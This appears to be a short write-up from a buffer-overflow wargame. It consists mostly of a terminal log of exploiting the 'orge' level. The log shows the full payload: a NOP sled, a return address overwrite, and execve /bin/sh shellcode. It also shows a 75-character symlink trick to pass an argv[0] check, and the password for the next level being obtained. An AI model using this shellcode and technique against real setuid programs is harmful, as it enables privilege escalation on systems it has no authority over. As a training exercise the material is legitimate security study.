An argv[0] check has been added.
However, this restriction has nothing to do with the method used before,
so I will reuse the previous payload as it is (using argv[2]).
[darkelf@localhost tmp]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44 + "\xd2\xf7\xff\xbf" + " " +"\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
argv[2] = 0xbffff7b9
������������������������������������������������
bash$ exit
exit
[darkelf@localhost tmp]$ rm -rf aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[darkelf@localhost tmp]$ ln -s ../
.bash_history .bash_profile .emacs orge tmp
.bash_logout .bashrc .screenrc orge.c
[darkelf@localhost tmp]$ ln -s ../orge `python -c 'print "a"*75'`
[darkelf@localhost tmp]$ ls
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
copy
core
orge
orge.c
[darkelf@localhost tmp]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44 + "\xd2\xf7\xff\xbf" + " " +"\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
������������������������������������������������
bash$ my-pass
euid = 507
timewalker
bash$